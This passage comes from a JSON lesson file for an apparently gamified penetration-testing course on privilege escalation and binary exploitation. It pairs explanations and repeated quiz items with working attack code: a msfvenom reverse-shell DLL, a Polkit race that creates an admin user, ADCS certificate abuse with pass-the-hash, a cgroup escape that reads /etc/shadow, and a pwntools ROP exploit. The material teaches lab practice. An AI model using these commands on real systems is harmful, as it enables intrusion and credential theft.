service, which runs as SYSTEM. Both local and remote variants exist."},{"type":"code","lang":"bash","content":"# Check if Print Spooler is running\nGet-Service -Name Spooler\n\n# Remote exploitation with cube0x0's tool\npython3 CVE-2021-1675.py domain.local/user:pass@target '\\attackershareevil.dll'\n\n# Generate the DLL\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f dll -o evil.dll\n\n# Host via SMB\nimpacket-smbserver share /path/to/dll -smb2support"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"PrintNightmare exploits which Windows service?","opts":["Windows Update","Print Spooler","DNS Client","Task Scheduler"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-linux-polkit","cat":"Privilege Escalation","title":"Polkit Privilege Escalation (CVE-2021-3560)","diff":3,"xp":250,"intro":"Race condition in Polkit allows creating an admin user.","sections":[{"type":"text","content":"Send a dbus message to create a user, then kill it mid-flight. The timing causes Polkit to authorize the request without authentication because the requesting PID no longer exists when Polkit checks."},{"type":"code","lang":"bash","content":"# Exploit the race condition\n# Send dbus message to create user and kill it immediately\nfor i in $(seq 1 100); do\n  dbus-send --system --dest=org.freedesktop.Accounts --type=method_call \\\n    --print-reply /org/freedesktop/Accounts \\\n    org.freedesktop.Accounts.CreateUser \\\n    string:hacker string:'Hacker' int32:1 &\n  PID=$!\n  sleep 0.005s  # timing matters\n  kill $PID 2>/dev/null\ndone\n# If successful, 'hacker' user exists with admin rights"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"CVE-2021-3560 is a...","opts":["Buffer overflow","Race condition in Polkit authorization","SQL injection","XSS vulnerability"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-ad-certificate-abuse","cat":"Privilege Escalation","title":"AD Certificate Services (ADCS) Abuse","diff":4,"xp":300,"intro":"Exploit misconfigured certificate templates for domain escalation.","sections":[{"type":"text","content":"ADCS certificate templates with 'Client Authentication' EKU + 'Enrollee supplies subject' + low-privilege enrollment = anyone can request a cert as any user, including Domain Admin."},{"type":"code","lang":"bash","content":"# Find vulnerable templates (ESC1)\ncertipy find -u user@domain.local -p pass -dc-ip DC -vulnerable\n\n# Request cert as Domain Admin\ncertipy req -u user@domain.local -p pass -ca 'Corp-CA' -target CA-server -template VulnTemplate -upn administrator@domain.local\n\n# Authenticate with the certificate\ncertipy auth -pfx administrator.pfx -dc-ip DC\n# Returns the NT hash of the administrator account\n\n# Now pass-the-hash\nimpacket-psexec -hashes :HASH administrator@DC"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"ESC1 ADCS vulnerability requires a template with...","opts":["Strong encryption","Enrollee supplies subject + Client Auth EKU + low-privilege enrollment","Admin-only access","Short validity period"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-container-breakout-advanced","cat":"Privilege Escalation","title":"Advanced Container Escape Techniques","diff":5,"xp":300,"intro":"Break out of hardened containers using kernel exploits, cgroup abuse, and namespace tricks.","sections":[{"type":"text","content":"Beyond --privileged: exploit writable cgroup release_agent, abuse user namespaces, leverage kernel vulnerabilities accessible from within containers, or exploit mounted secrets."},{"type":"code","lang":"bash","content":"# CVE-2022-0492: cgroup escape (even unprivileged)\nmkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x\necho 1 > /tmp/cgrp/x/notify_on_release\necho '#!/bin/sh' > /cmd\necho 'cat /etc/shadow > /tmp/cgrp/output' >> /cmd\nchmod +x /cmd\necho /cmd > /tmp/cgrp/release_agent\nsh -c 'echo $$ > /tmp/cgrp/x/cgroup.procs'\n\n# CoreDNS/kubelet token theft from mounted serviceaccount\ncat /var/run/secrets/kubernetes.io/serviceaccount/token\n# Use token to access K8s API"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Cgroup release_agent escape works by...","opts":["Modifying iptables","Writing a script that the kernel executes when the cgroup is empty","Changing container settings","DNS tunneling"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"exploit-rop-advanced","cat":"Exploitation","title":"Advanced ROP Chain Construction","diff":4,"xp":300,"intro":"Build multi-stage ROP chains for complex exploit scenarios.","sections":[{"type":"text","content":"Real-world ROP: chain gadgets to call mprotect() to make the stack executable, then jump to shellcode. Or chain write-what-where gadgets to overwrite GOT entries."},{"type":"code","lang":"python","content":"from pwn import *\n\nelf = ELF('./vuln')\nlibc = ELF('./libc.so.6')\n\n# Stage 1: Leak libc address via puts@GOT\nrop = ROP(elf)\nrop.puts(elf.got['puts'])  # leak puts@libc\nrop.call(elf.symbols['main'])  # return to main for stage 2\n\np = process('./vuln')\np.sendline(b'A'*offset + rop.chain())\nleak = u64(p.recvline()[:6].ljust(8, b'x00'))\nlibc.address = leak - libc.symbols['puts']\n\n# Stage 2: system('/bin/sh') with known libc base\nrop2 = ROP(libc)\nrop2.system(next(libc.search(b'/bin/sh')))\np.sendline(b'A'*offset + rop2.chain())"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"A two-stage ROP chain is needed when...","opts":["One gadget is enough","You need to leak addresses first, then use them in a second payload","The binary is small","ASLR is disabled"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"exploit-heap-feng-shui","cat":"Exploitation","title":"Heap Feng Shui","diff":5,"xp":300,"intro":"Shape the heap layout to place objects exactly where you need them for exploitation.","sections":[{"type":"text","content":"Heap feng shui: carefully allocate and free objects in a specific order so that a freed object's slot is reclaimed by your controlled data. This turns a UAF or heap overflow into a reliable exploit."},{"type":"code","lang":"c","content":"// Heap feng shui concept:\n// 1. Spray: allocate many objects of target size\nfor (int i = 0; i < 1000; i++)\n    objects[i] = malloc(TARGET_SIZE);\n// 2. Create holes: free specific objects\nfor (int i = 500; i < 510; i++)\n    free(objects[i]);\n// 3. Trigger the vulnerability (allocates into one of the holes)\ntrigger_uaf_or_overflow();\n// 4. Reclaim: your controlled data fills adjacent holes\nfor (int i = 0; i < 10; i++)\n    evil[i] = malloc(TARGET_SIZE);\n    memcpy(evil[i], controlled_data, TARGET_SIZE);"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Heap feng shui achieves...","opts":["Faster execution","Predictable heap layout for reliable exploitation","Memory compression","Stack protection"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network ports"],"ans":1},{"type":"quiz","q":"Stack canary detects...","opts":["Memory leaks","Buffer overflow","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"Staged payload...","opts":["Is larger","Downloads full payload in second connection","Is encrypted","Uses different protocol"],"ans":1},{"type":"quiz","q":"Reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways","Through DNS"],"ans":1}]},{"id":"exploit-windows-kernel","cat":"Exploitation","title":"Windows Kernel Exploitation","diff":5,"xp":300,"intro":"Exploit a Windows kernel vulnerability: pool overflow to SYSTEM.","sections":[{"type":"text","content":"Windows kernel exploitation: trigger a pool overflow or UAF in a kernel driver, corrupt pool metadata or adjacent objects, build read/write primitives, then steal the SYSTEM process token and assign it to your process."},{"type":"code","lang":"c","content":"// Simplified Windows kernel exploit flow:\n// 1. Trigger pool overflow in a driver via DeviceIoControl\nDeviceIoControl(hDevice, IOCTL_VULN, input, overflow_size, NULL, 0, &bytes, NULL);\n// 2. Spray pool with known objects to control adjacent memory\n// Use NtAllocateVirtualMemory, Event objects, or IoCompletionPorts\n// 3. Corrupt an adjacent object's function pointer\n// 4. Trigger the corrupted function pointer -> code execution in kernel\n// 5. Token stealing shellcode:\n//    - Find current EPROCESS\n//    - Find SYSTEM EPROCESS (PID 4)\n//    - Copy SYSTEM's Token to current process\n//    - Return cleanly"},{"type":"text","content":"Understanding HOW exploits work separates professionals from script kiddies. Every overflow teaches memory layout, every injection teaches parsing."},{"type":"tip","content":"Read the exploit source or CVE advisory before running it. Know what it sends, what it triggers, and what happens on failure."},{"type":"task","content":"Walk through a buffer overflow manually: find crash, determine offset, control EIP, handle bad chars, find gadget, write shellcode. No Metasploit."},{"type":"quiz","q":"Windows kernel pool spraying uses...","opts":["User-mode malloc","Kernel objects like Events, IoCompletionPorts, or NtAllocateVirtualMemory","Stack allocation","Heap allocation"],"ans":1},{"type":"quiz","q":"The stack grows in which direction on x86?","opts":["Upward (higher addresses)","Downward (lower addresses)","Randomly","Horizontally"],"ans":1},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"PIE stands for...","opts":["Process Injection Engine","Position Independent Executable","Protocol Interface Extension","Packet Inspection Engine"],"ans":1},{"type":"quiz","q":"What is a gadget in ROP?","opts":["A hardware device","A short instruction sequence ending in ret","A Metasploit module","A type of shellcode"],"ans":1},{"type":"quiz","q":"pwntools is a Python library for...","opts":["Web scraping","Binary exploitation (CTF/exploit dev)","Machine learning","Database management"],"ans":1},{"type":"quiz","q":"What tool finds ROP gadgets?","opts":["nmap","ROPgadget / ropper","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"A bind shell listens on...","opts":["The attacker's machine","The target machine","A relay server","A random port"],"ans":1},{"type":"quiz","q":"GDB is used for...","opts":["Network analysis","Binary debugging","Web testing","Password cracking"],"ans":1},{"type":"quiz","q":"EIP holds...","opts":["Stack pointer","Next instruction address","Base pointer","Data"],"ans":1},{"type":"quiz","q":"NOP does...","opts":["Crashes","Nothing","Network op","New object"],"ans":1},{"type":"quiz","q":"Payload runs...","opts":["Before exploit","After exploitation succeeds","Instead of exploit","Never"],"ans":1},{"type":"quiz","q":"0-day means...","opts":["Old exploit","Unknown/unpatched vulnerability","One-day bug","Free exploit"],"ans":1},{"type":"quiz","q":"Buffer overflow overwrites...","opts":["Network packets","Memory beyond buffer","File contents","Registry"],"ans":1},{"type":"quiz","q":"Meterpreter is...","opts":["Scanner","Advanced Metasploit shell","Firewall","Encryption tool"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["Passwords","Memory addresses","File names","Network 